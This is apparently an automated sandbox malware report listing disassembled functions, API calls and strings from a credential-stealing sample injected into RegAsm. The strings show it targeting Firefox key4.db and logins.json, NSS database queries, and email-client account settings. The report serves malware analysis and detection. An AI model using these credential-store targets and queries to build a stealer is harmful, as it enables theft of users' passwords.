                                                                                                                                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                      • API String ID: 168965057-606283353
                                                                                                                                                                                                                      • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                                                      • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                                                      • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                                                      • API String ID: 1428123949-3474136107
                                                                                                                                                                                                                      • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                                      • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                                                                                                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00401166
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                                                                                                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040128E
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2998058495-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                        • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 0040BD23
                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                                                                                                                                                                                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                                                                                                                                                                                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040BE93
                                                                                                                                                                                                                      • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 0040BECE
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BEFE
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040BF0C
                                                                                                                                                                                                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                                                                                                                                                                                                        • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                                                                                                                                                                                                        • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040BFDB
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                                                                                                                                                                                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                                                                                                                                                                                                      • API String ID: 2303586283-933021314
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                                                                                                                      • API String ID: 231171946-2189169393
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                      • API String ID: 633282248-1996832678
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406782
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040686E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004068EC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004069B2
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004069CA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406A4A
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                                                                                                                                      • key4.db, xrefs: 00406756
                                                                                                                                                                                                                      • , xrefs: 00406834
                                                                                                                                                                                                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memcmp$memsetstrlen
                                                                                                                                                                                                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                                                        • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                                                        • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                                                      • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444612
                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444668
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444690
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                                                      • String ID: salu
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
